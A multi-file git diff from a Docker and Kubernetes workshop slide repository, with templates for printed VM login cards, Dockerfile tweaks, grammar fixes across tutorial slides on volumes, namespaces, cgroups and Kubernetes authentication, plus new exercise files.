<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>

</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% for x in range(pagesize) %}
<div class="back">
<br/>
<p>You got this at the workshop
"Getting Started With Kubernetes and Container Orchestration"
during QCON London (March 2019).</p>
<p>If you liked that workshop,
I can train your team or organization
on Docker, container, and Kubernetes,
with curriculums of 1 to 5 days.
</p>
<p>Interested? Contact me at:</p>
<p>jerome.petazzoni@gmail.com</p>
<p>Thank you!</p>
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endfor %}
</body>
</html>
@@ -1,106 +0,0 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
  margin: 0;
  padding: 0;
  line-height: 1em;
  font-size: 14px;
}

table {
  border-spacing: 0;
  margin-top: 0.4em;
  margin-bottom: 0.4em;
  border-left: 0.8em double grey;
  padding-left: 0.4em;
}

div {
  float: left;
  border: 1px dotted black;
  padding-top: 1%;
  padding-bottom: 1%;
  /* columns * (width+left+right) < 100% */
  width: 21.5%;
  padding-left: 1.5%;
  padding-right: 1.5%;
}

p {
  margin: 0.4em 0 0.4em 0;
}

img {
  height: 4em;
  float: right;
  margin-right: -0.4em;
}

.logpass {
  font-family: monospace;
  font-weight: bold;
}

.pagebreak {
  page-break-after: always;
  clear: both;
  display: block;
  height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>

<p>
  Here is the connection information to your very own
  {{ cluster_or_machine }} for this {{ workshop_name }}.
  You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>

</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>
@@ -1,7 +1,4 @@
-FROM alpine
-RUN apk update
-RUN apk add entr
-RUN apk add py-pip
-RUN apk add git
+FROM alpine:3.9
+RUN apk add --no-cache entr py-pip git
 COPY requirements.txt .
 RUN pip install -r requirements.txt
@@ -150,7 +150,7 @@ Different deployments will use different underlying technologies.
 * Ad-hoc deployments can use a master-less discovery protocol
   like avahi to register and discover services.
 * It is also possible to do one-shot reconfiguration of the
-  ambassadors. It is slightly less dynamic but has much less
+  ambassadors. It is slightly less dynamic but has far fewer
   requirements.
 * Ambassadors can be used in addition to, or instead of, overlay networks.
@@ -186,22 +186,48 @@ Different deployments will use different underlying technologies.
 
 ---
 
-## Section summary
+## Some popular service meshes
 
-We've learned how to:
+... And related projects:
 
-* Understand the ambassador pattern and what it is used for (service portability).
-
-For more information about the ambassador pattern, including demos on Swarm and ECS:
-
-* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
-
-* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
-
-Some services meshes and related projects:
-
-* [Istio](https://istio.io/)
-
-* [Linkerd](https://linkerd.io/)
+* [Consul Connect](https://www.consul.io/docs/connect/index.html)
+  <br/>
+  Transparently secures service-to-service connections with mTLS.
+
+* [Gloo](https://gloo.solo.io/)
+  <br/>
+  API gateway that can interconnect applications on VMs, containers, and serverless.
+
+* [Istio](https://istio.io/)
+  <br/>
+  A popular service mesh.
+
+* [Linkerd](https://linkerd.io/)
+  <br/>
+  Another popular service mesh.
+
+---
+
+## Learning more about service meshes
+
+A few blog posts about service meshes:
+
+* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
+  <br/>
+  Provides historical context: how did we do before service meshes were invented?
+
+* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
+  <br/>
+  Explains the purpose of service meshes. Illustrates some NGINX features.
+
+* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
+  <br/>
+  Includes high-level overview and definitions.
+
+* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
+  <br/>
+  Includes a step-by-step demo of Linkerd.
+
+And a video:
+
+* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
@@ -98,13 +98,13 @@ COPY prometheus.conf /etc
 
 * Allows arbitrary customization and complex configuration files.
 
-* Requires to write a configuration file. (Obviously!)
+* Requires writing a configuration file. (Obviously!)
 
-* Requires to build an image to start the service.
+* Requires building an image to start the service.
 
-* Requires to rebuild the image to reconfigure the service.
+* Requires rebuilding the image to reconfigure the service.
 
-* Requires to rebuild the image to upgrade the service.
+* Requires rebuilding the image to upgrade the service.
 
 * Configured images can be stored in registries.
@@ -132,11 +132,11 @@ docker run -v appconfig:/etc/appconfig myapp
 
 * Allows arbitrary customization and complex configuration files.
 
-* Requires to create a volume for each different configuration.
+* Requires creating a volume for each different configuration.
 
 * Services with identical configurations can use the same volume.
 
-* Doesn't require to build / rebuild an image when upgrading / reconfiguring.
+* Doesn't require building / rebuilding an image when upgrading / reconfiguring.
 
 * Configuration can be generated or edited through another container.
@@ -198,4 +198,4 @@ E.g.:
 
 - read the secret on stdin when the service starts,
 
-- pass the secret using an API endpoint.
+- pass the secret using an API endpoint.
@@ -257,7 +257,7 @@ $ docker kill 068 57ad
 The `stop` and `kill` commands can take multiple container IDs.
 
 Those containers will be terminated immediately (without
-the 10 seconds delay).
+the 10-second delay).
 
 Let's check that our containers don't show up anymore:
@@ -222,16 +222,16 @@ CMD ["hello world"]
 Let's build it:
 
 ```bash
-$ docker build -t figlet .
+$ docker build -t myfiglet .
 ...
 Successfully built 6e0b6a048a07
-Successfully tagged figlet:latest
+Successfully tagged myfiglet:latest
 ```
 
 Run it without parameters:
 
 ```bash
-$ docker run figlet
+$ docker run myfiglet
 _ _ _ _
| | | | | | | | |
| | _ | | | | __ __ ,_ | | __|
@@ -246,7 +246,7 @@ $ docker run figlet
 Now let's pass extra arguments to the image.
 
 ```bash
-$ docker run figlet hola mundo
+$ docker run myfiglet hola mundo
 _ _
| | | | |
| | __ | | __, _ _ _ _ _ __| __
@@ -262,13 +262,13 @@ We overrode `CMD` but still used `ENTRYPOINT`.
 
 What if we want to run a shell in our container?
 
-We cannot just do `docker run figlet bash` because
+We cannot just do `docker run myfiglet bash` because
 that would just tell figlet to display the word "bash."
 
 We use the `--entrypoint` parameter:
 
 ```bash
-$ docker run -it --entrypoint bash figlet
+$ docker run -it --entrypoint bash myfiglet
 root@6027e44e2955:/#
 ```
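To see why the override behaves this way, it can help to look at what the image actually stores (a minimal sketch, assuming the `myfiglet` image built above):

```bash
# Entrypoint stays fixed unless overridden; Cmd is replaced by run arguments.
$ docker inspect --format '{{.Config.Entrypoint}} {{.Config.Cmd}}' myfiglet
```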
@@ -86,7 +86,7 @@ like Windows, macOS, Solaris, FreeBSD ...
 
 * No notion of image (container filesystems have to be managed manually).
 
-* Networking has to be setup manually.
+* Networking has to be set up manually.
 
 ---
@@ -112,7 +112,7 @@ like Windows, macOS, Solaris, FreeBSD ...
 
 * Strong emphasis on security (through privilege separation).
 
-* Networking has to be setup separately (e.g. through CNI plugins).
+* Networking has to be set up separately (e.g. through CNI plugins).
 
 * Partial image management (pull, but no push).
@@ -152,7 +152,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
 
 * Basic image support (tar archives and raw disk images).
 
-* Network has to be setup manually.
+* Network has to be set up manually.
 
 ---
@@ -164,7 +164,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
 
 * Run each container in a lightweight virtual machine.
 
-* Requires to run on bare metal *or* with nested virtualization.
+* Requires running on bare metal *or* with nested virtualization.
 
 ---
@@ -474,7 +474,7 @@ When creating a network, extra options can be provided.
 
 * `--ip-range` (in CIDR notation) indicates the subnet to allocate from.
 
-* `--aux-address` allows to specify a list of reserved addresses (which won't be allocated to containers).
+* `--aux-address` allows specifying a list of reserved addresses (which won't be allocated to containers).
 
 ---
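A hedged example combining these flags (the network name and subnet values are arbitrary):

```bash
$ docker network create mynet2 \
    --subnet 10.66.0.0/16 \
    --ip-range 10.66.33.0/24 \
    --aux-address "reserved1=10.66.33.2"
```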
@@ -528,7 +528,9 @@ Very short instructions:
 
 - `docker network create mynet --driver overlay`
 - `docker service create --network mynet myimage`
 
-See https://jpetazzo.github.io/container.training for all the deets about clustering!
+If you want to learn more about Swarm mode, you can check
+[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
+or [these slides](https://container.training/swarm-selfpaced.yml.html).
 
 ---
@@ -554,7 +556,7 @@ General idea:
 
 * So far, we have specified which network to use when starting the container.
 
-* The Docker Engine also allows to connect and disconnect while the container runs.
+* The Docker Engine also allows connecting and disconnecting while the container is running.
 
 * This feature is exposed through the Docker API, and through two Docker CLI commands:
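For instance (a minimal sketch; the container and network names are placeholders):

```bash
$ docker network create testnet
$ docker run -d --name web nginx
$ docker network connect testnet web     # attach while running
$ docker network disconnect testnet web  # detach, still running
```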
5  slides/containers/Exercise_Composefile.md  Normal file
@@ -0,0 +1,5 @@
# Exercise — writing a Compose file

Let's write a Compose file for the wordsmith app!

The code is at: https://github.com/jpetazzo/wordsmith
9  slides/containers/Exercise_Dockerfile_Advanced.md  Normal file
@@ -0,0 +1,9 @@
# Exercise — writing better Dockerfiles

Let's update our Dockerfiles to leverage multi-stage builds!

The code is at: https://github.com/jpetazzo/wordsmith

Use a different tag for these images, so that we can compare their sizes.

What's the size difference between single-stage and multi-stage builds?
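One way to run that comparison once both Dockerfiles exist (a sketch; the `:single` / `:multi` tags and the `Dockerfile.multistage` filename are just a suggested convention):

```bash
$ docker build -t wordsmith-web:single -f Dockerfile .
$ docker build -t wordsmith-web:multi -f Dockerfile.multistage .
# Compare the SIZE column for both tags.
$ docker images wordsmith-web
```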
5  slides/containers/Exercise_Dockerfile_Basic.md  Normal file
@@ -0,0 +1,5 @@
# Exercise — writing Dockerfiles

Let's write Dockerfiles for an existing application!

The code is at: https://github.com/jpetazzo/wordsmith
@@ -203,4 +203,90 @@ bash: figlet: command not found
 
 * The basic Ubuntu image was used, and `figlet` is not here.
 
 * We will see in the next chapters how to bake a custom image with `figlet`.
+---
+
+## Where's my container?
+
+* Can we reuse that container that we took time to customize?
+
+  *We can, but that's not the default workflow with Docker.*
+
+* What's the default workflow, then?
+
+  *Always start with a fresh container.*
+  <br/>
+  *If we need something installed in our container, build a custom image.*
+
+* That seems complicated!
+
+  *We'll see that it's actually pretty easy!*
+
+* And what's the point?
+
+  *This puts a strong emphasis on automation and repeatability. Let's see why ...*
+
+---
+
+## Pets vs. Cattle
+
+* In the "pets vs. cattle" metaphor, there are two kinds of servers.
+
+* Pets:
+
+  * have distinctive names and unique configurations
+
+  * when they have an outage, we do everything we can to fix them
+
+* Cattle:
+
+  * have generic names (e.g. with numbers) and generic configuration
+
+  * configuration is enforced by configuration management, golden images ...
+
+  * when they have an outage, we can replace them immediately with a new server
+
+* What's the connection with Docker and containers?
+
+---
+
+## Local development environments
+
+* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
+
+  * create VM from base template (Ubuntu, CentOS...)
+
+  * install packages, set up environment
+
+  * work on project
+
+  * when done, shut down VM
+
+  * next time we need to work on project, restart VM as we left it
+
+  * if we need to tweak the environment, we do it live
+
+* Over time, the VM configuration evolves, diverges.
+
+* We don't have a clean, reliable, deterministic way to provision that environment.
+
+---
+
+## Local development with Docker
+
+* With Docker, the workflow looks like this:
+
+  * create container image with our dev environment
+
+  * run container with that image
+
+  * work on project
+
+  * when done, shut down container
+
+  * next time we need to work on project, start a new container
+
+  * if we need to tweak the environment, we create a new image
+
+* We have a clear definition of our environment, and can share it reliably with others.
+
+* Let's see in the next chapters how to bake a custom image with `figlet`!
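That Docker workflow, condensed to commands (a sketch; the image name and mount path are placeholders):

```bash
# Bake the dev environment once ...
$ docker build -t mydevenv .
# ... then always work in a fresh, disposable container,
# mounting the project directory in.
$ docker run -it --rm -v $(pwd):/src mydevenv
# Tweaking the environment = editing the Dockerfile and rebuilding,
# not mutating a long-lived container.
$ docker build -t mydevenv .
```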
@@ -70,8 +70,9 @@ class: pic
 
 * An image is a read-only filesystem.
 
-* A container is an encapsulated set of processes running in a
-  read-write copy of that filesystem.
+* A container is an encapsulated set of processes,
+
+  running in a read-write copy of that filesystem.
 
 * To optimize container boot time, *copy-on-write* is used
   instead of regular copy.
@@ -177,8 +178,11 @@ Let's explain each of them.
 
 ## Root namespace
 
-The root namespace is for official images. They are put there by Docker Inc.,
-but they are generally authored and maintained by third parties.
+The root namespace is for official images.
+
+They are gated by Docker Inc.
+
+They are generally authored and maintained by third parties.
 
 Those images include:
@@ -188,7 +192,7 @@ Those images include:
 
 * Ready-to-use components and services, like redis, postgresql...
 
-* Over 130 at this point!
+* Over 150 at this point!
 
 ---
@@ -156,7 +156,7 @@ Option 3:
 
 * Use a *volume* to mount local files into the container
 * Make changes locally
-* Changes are reflected into the container
+* Changes are reflected in the container
 
 ---
@@ -176,7 +176,7 @@ $ docker run -d -v $(pwd):/src -P namer
 
 * `namer` is the name of the image we will run.
 
-* We don't specify a command to run because it is already set in the Dockerfile.
+* We don't specify a command to run because it is already set in the Dockerfile via `CMD`.
 
 Note: on Windows, replace `$(pwd)` with `%cd%` (or `${pwd}` if you use PowerShell).
@@ -192,7 +192,7 @@ The flag structure is:
 [host-path]:[container-path]:[rw|ro]
 ```
 
-* If `[host-path]` or `[container-path]` doesn't exist it is created.
+* `[host-path]` and `[container-path]` are created if they don't exist.
 
 * You can control the write status of the volume with the `ro` and
   `rw` options.
@@ -255,13 +255,13 @@ color: red;
 
 * Volumes are *not* copying or synchronizing files between the host and the container.
 
-* Volumes are *bind mounts*: a kernel mechanism associating a path to another.
+* Volumes are *bind mounts*: a kernel mechanism associating one path with another.
 
 * Bind mounts are *kind of* similar to symbolic links, but at a very different level.
 
 * Changes made on the host or on the container will be visible on the other side.
 
-  (Since under the hood, it's the same file on both anyway.)
+  (Under the hood, it's the same file anyway.)
 
 ---
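This is easy to verify directly (a minimal sketch; directory and container names are placeholders):

```bash
$ mkdir -p /tmp/bindmount-demo
$ docker run -d --name demo -v /tmp/bindmount-demo:/data alpine sleep 300
$ touch /tmp/bindmount-demo/hello
$ docker exec demo ls /data   # shows "hello": same file, two paths
```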
@@ -273,7 +273,7 @@ by Chad Fowler, where he explains the concept of immutable infrastructure.)*
 
 --
 
-* Let's mess up majorly with our container.
+* Let's majorly mess up our container.
 
   (Remove files or whatever.)
@@ -319,7 +319,7 @@ and *canary deployments*.
    <br/>
    Use the `-v` flag to mount our source code inside the container.
 
-3. Edit the source code outside the containers, using regular tools.
+3. Edit the source code outside the container, using familiar tools.
    <br/>
    (vim, emacs, textmate...)
@@ -86,13 +86,13 @@ class: extra-details, deep-dive
 
 - the `unshare()` system call.
 
-- The Linux tool `unshare` allows to do that from a shell.
+- The Linux tool `unshare` allows doing that from a shell.
 
 - A new process can re-use none / all / some of the namespaces of its parent.
 
 - It is possible to "enter" a namespace with the `setns()` system call.
 
-- The Linux tool `nsenter` allows to do that from a shell.
+- The Linux tool `nsenter` allows doing that from a shell.
 
 ---
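For example (requires root; a sketch of both tools, where `$PID` is a placeholder for a process in the target namespace):

```bash
# Run a command in a private UTS namespace: hostname changes stay inside it.
$ sudo unshare --uts sh -c 'hostname demo; hostname'
demo
$ hostname   # unchanged on the host

# Enter the UTS namespace of an existing process and read its hostname.
$ sudo nsenter --target $PID --uts hostname
```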
@@ -138,11 +138,11 @@ class: extra-details, deep-dive
 
 - gethostname / sethostname
 
-  - Allows to set a custom hostname for a container.
+  - Allows setting a custom hostname for a container.
 
   - That's (mostly) it!
 
-  - Also allows to set the NIS domain.
+  - Also allows setting the NIS domain.
 
     (If you don't know what a NIS domain is, you don't have to worry about it!)
@@ -392,13 +392,13 @@ class: extra-details
 
 - Processes can have their own root fs (à la chroot).
 
-- Processes can also have "private" mounts. This allows to:
+- Processes can also have "private" mounts. This allows:
 
-  - isolate `/tmp` (per user, per service...)
+  - isolating `/tmp` (per user, per service...)
 
-  - mask `/proc`, `/sys` (for processes that don't need them)
+  - masking `/proc`, `/sys` (for processes that don't need them)
 
-  - mount remote filesystems or sensitive data,
+  - mounting remote filesystems or sensitive data,
   <br/>but make it visible only for allowed processes
 
 - Mounts can be totally private, or shared.
@@ -570,7 +570,7 @@ Check `man 2 unshare` and `man pid_namespaces` if you want more details.
 
 ## User namespace
 
-- Allows to map UID/GID; e.g.:
+- Allows mapping UID/GID; e.g.:
 
   - UID 0→1999 in container C1 is mapped to UID 10000→11999 on host
   - UID 0→1999 in container C2 is mapped to UID 12000→13999 on host
@@ -947,7 +947,7 @@ Killed
 
   (i.e., "this group of process used X seconds of CPU0 and Y seconds of CPU1".)
 
-- Allows to set relative weights used by the scheduler.
+- Allows setting relative weights used by the scheduler.
 
 ---
@@ -1101,9 +1101,9 @@ See `man capabilities` for the full list and details.
|
||||
|
||||
- Original seccomp only allows `read()`, `write()`, `exit()`, `sigreturn()`.
|
||||
|
||||
- The seccomp-bpf extension allows to specify custom filters with BPF rules.
|
||||
- The seccomp-bpf extension allows specifying custom filters with BPF rules.
|
||||
|
||||
- This allows to filter by syscall, and by parameter.
|
||||
- This allows filtering by syscall, and by parameter.
|
||||
|
||||
- BPF code can perform arbitrarily complex checks, quickly, and safely.
|
||||
|
||||
|
||||
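With Docker, a custom seccomp-bpf profile can be passed when creating a container (the `profile.json` path is hypothetical):

```bash
# Use a custom profile (a JSON file that the engine compiles to BPF rules):
docker run --rm --security-opt seccomp=./profile.json alpine date

# Or disable seccomp entirely (not recommended!):
docker run --rm --security-opt seccomp=unconfined alpine date
```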
@@ -6,8 +6,6 @@ In this chapter, we will:
|
||||
|
||||
* Present (from a high-level perspective) some orchestrators.
|
||||
|
||||
* Show one orchestrator (Kubernetes) in action.
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
@@ -121,7 +119,7 @@ Now, how are things for our IAAS provider?
|
||||
- Solution: *migrate* VMs and shutdown empty servers
|
||||
|
||||
(e.g. combine two hypervisors with 40% load into 80%+0%,
|
||||
<br/>and shutdown the one at 0%)
|
||||
<br/>and shut down the one at 0%)
|
||||
|
||||
---
|
||||
|
||||
@@ -129,7 +127,7 @@ Now, how are things for our IAAS provider?
|
||||
|
||||
How do we implement this?
|
||||
|
||||
- Shutdown empty hosts (but keep some spare capacity)
|
||||
- Shut down empty hosts (but keep some spare capacity)
|
||||
|
||||
- Start hosts again when capacity gets low
|
||||
|
||||
@@ -177,7 +175,7 @@ In practice, these goals often conflict.
|
||||
|
||||
- 16 GB RAM, 8 cores, 1 TB disk
|
||||
|
||||
- Each week, your team asks:
|
||||
- Each week, your team requests:
|
||||
|
||||
- one VM with X RAM, Y CPU, Z disk
|
||||
|
||||
|
||||
@@ -72,7 +72,7 @@
|
||||
|
||||
- For memory usage, the mechanism is part of the *cgroup* subsystem.
|
||||
|
||||
- This subsystem allows to limit the memory for a process or a group of processes.
|
||||
- This subsystem allows limiting the memory for a process or a group of processes.
|
||||
|
||||
- A container engine leverages these mechanisms to limit memory for a container.
|
||||
|
||||
|
||||
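A sketch of that behavior with Docker (the cgroup path shown corresponds to the typical cgroups v1 layout):

```bash
# Cap a container at 100 MB of memory:
docker run -d --name capped --memory=100m nginx

# Under the hood, the engine writes the limit to something like:
cat /sys/fs/cgroup/memory/docker/$(docker inspect -f '{{.Id}}' capped)/memory.limit_in_bytes
```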
@@ -45,13 +45,13 @@ individual Docker VM.*
|
||||
|
||||
- The Docker Engine is a daemon (a service running in the background).
|
||||
|
||||
- This daemon manages containers, the same way that an hypervisor manages VMs.
|
||||
- This daemon manages containers, the same way that a hypervisor manages VMs.
|
||||
|
||||
- We interact with the Docker Engine by using the Docker CLI.
|
||||
|
||||
- The Docker CLI and the Docker Engine communicate through an API.
|
||||
|
||||
- There are many other programs, and many client libraries, to use that API.
|
||||
- There are many other programs and client libraries which use that API.
|
||||
|
||||
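For instance, we can talk to that API directly with `curl` (a sketch; assumes access to the default UNIX socket):

```bash
# List running containers, just like "docker ps" does:
curl --unix-socket /var/run/docker.sock http://localhost/containers/json
```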
---
|
||||
|
||||
|
||||
@@ -33,13 +33,13 @@ Docker volumes can be used to achieve many things, including:
|
||||
|
||||
* Sharing a *single file* between the host and a container.
|
||||
|
||||
* Using remote storage and custom storage with "volume drivers".
|
||||
* Using remote storage and custom storage with *volume drivers*.
|
||||
|
||||
---
|
||||
|
||||
## Volumes are special directories in a container
|
||||
|
||||
Volumes can be declared in two different ways.
|
||||
Volumes can be declared in two different ways:
|
||||
|
||||
* Within a `Dockerfile`, with a `VOLUME` instruction.
|
||||
|
||||
@@ -163,7 +163,7 @@ Volumes are not anchored to a specific path.
|
||||
|
||||
* Volumes are used with the `-v` option.
|
||||
|
||||
* When a host path does not contain a /, it is considered to be a volume name.
|
||||
* When a host path does not contain a `/`, it is considered a volume name.
|
||||
|
||||
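To illustrate the rule (a sketch; the volume and path names here are arbitrary):

```bash
# No slash: "webapps" is a named volume
docker run -d -v webapps:/usr/share/nginx/html nginx

# Slashes: "/path/on/host" is a host directory (bind mount)
docker run -d -v /path/on/host:/usr/share/nginx/html nginx
```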
Let's start a web server using the two previous volumes.
|
||||
|
||||
@@ -189,7 +189,7 @@ $ curl localhost:1234
|
||||
|
||||
* In this example, we will run a text editor in the other container.
|
||||
|
||||
(But this could be a FTP server, a WebDAV server, a Git receiver...)
|
||||
(But this could be an FTP server, a WebDAV server, a Git receiver...)
|
||||
|
||||
Let's start another container using the `webapps` volume.
|
||||
|
||||
|
||||
@@ -1,3 +1,11 @@
|
||||
- date: [2019-11-04, 2019-11-05]
|
||||
country: de
|
||||
city: Berlin
|
||||
event: Velocity
|
||||
speaker: jpetazzo
|
||||
title: Deploying and scaling applications with Kubernetes
|
||||
attend: https://conferences.oreilly.com/velocity/vl-eu/public/schedule/detail/79109
|
||||
|
||||
- date: 2019-11-13
|
||||
country: fr
|
||||
city: Marseille
|
||||
@@ -31,6 +39,7 @@
|
||||
title: Kubernetes for administrators and operators
|
||||
speaker: jpetazzo
|
||||
attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
|
||||
slides: https://kadm-2019-06.container.training/
|
||||
|
||||
- date: 2019-05-01
|
||||
country: us
|
||||
|
||||
@@ -30,27 +30,11 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- - containers/Copying_Files_During_Build.md
|
||||
- |
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- |
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -64,13 +48,7 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- |
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- containers/Exercise_Composefile.md
|
||||
- - containers/Docker_Machine.md
|
||||
- containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -30,9 +30,11 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -45,6 +47,7 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -356,9 +356,9 @@ We demonstrated *update* and *watch* semantics.
|
||||
|
||||
- we create a Deployment object
|
||||
|
||||
- the Deployment controller notices it, creates a ReplicaSet
|
||||
- the Deployment controller notices it, and creates a ReplicaSet
|
||||
|
||||
- the ReplicaSet controller notices it, creates a Pod
|
||||
- the ReplicaSet controller notices the ReplicaSet, and creates a Pod
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -22,7 +22,7 @@
|
||||
|
||||
- When the API server receives a request, it tries to authenticate it
|
||||
|
||||
(it examines headers, certificates ... anything available)
|
||||
(it examines headers, certificates... anything available)
|
||||
|
||||
- Many authentication methods are available and can be used simultaneously
|
||||
|
||||
@@ -34,7 +34,7 @@
|
||||
- the user ID
|
||||
- a list of groups
|
||||
|
||||
- The API server doesn't interpret these; it'll be the job of *authorizers*
|
||||
- The API server doesn't interpret these; that'll be the job of *authorizers*
|
||||
|
||||
---
|
||||
|
||||
@@ -50,7 +50,7 @@
|
||||
|
||||
- [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication)
|
||||
|
||||
(carrying user and password in a HTTP header)
|
||||
(carrying user and password in an HTTP header)
|
||||
|
||||
- Authentication proxy
|
||||
|
||||
@@ -88,7 +88,7 @@
|
||||
|
||||
(i.e. they are not stored in etcd or anywhere else)
|
||||
|
||||
- Users can be created (and given membership to groups) independently of the API
|
||||
- Users can be created (and added to groups) independently of the API
|
||||
|
||||
- The Kubernetes API can be set up to use your custom CA to validate client certs
|
||||
|
||||
@@ -143,19 +143,21 @@ class: extra-details
|
||||
|
||||
(see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))
|
||||
|
||||
- As a result, we cannot easily suspend a user's access
|
||||
- As a result, we don't have an easy way to terminate someone's access
|
||||
|
||||
- There are workarounds, but they are very inconvenient:
|
||||
(if their key is compromised, or they leave the organization)
|
||||
|
||||
- issue short-lived certificates (e.g. 24 hours) and regenerate them often
|
||||
- Option 1: re-create a new CA and re-issue everyone's certificates
|
||||
<br/>
|
||||
→ Maybe OK if we only have a few users; no way otherwise
|
||||
|
||||
- re-create the CA and re-issue all certificates in case of compromise
|
||||
- Option 2: don't use groups; grant permissions to individual users
|
||||
<br/>
|
||||
→ Inconvenient if we have many users and teams; error-prone
|
||||
|
||||
- grant permissions to individual users, not groups
|
||||
<br/>
|
||||
(and remove all permissions to a compromised user)
|
||||
|
||||
- Until this is fixed, we probably want to use other methods
|
||||
- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
|
||||
<br/>
|
||||
→ This can be facilitated by e.g. Vault or by the Kubernetes CSR API
|
||||
|
||||
---
|
||||
|
||||
@@ -191,7 +193,7 @@ class: extra-details
|
||||
|
||||
(the kind that you can view with `kubectl get secrets`)
|
||||
|
||||
- Service accounts are generally used to grant permissions to applications, services ...
|
||||
- Service accounts are generally used to grant permissions to applications, services...
|
||||
|
||||
(as opposed to humans)
|
||||
|
||||
@@ -215,7 +217,7 @@ class: extra-details
|
||||
|
||||
.exercise[
|
||||
|
||||
- The resource name is `serviceaccount` or `sa` in short:
|
||||
- The resource name is `serviceaccount` or `sa` for short:
|
||||
```bash
|
||||
kubectl get sa
|
||||
```
|
||||
@@ -307,7 +309,7 @@ class: extra-details
|
||||
|
||||
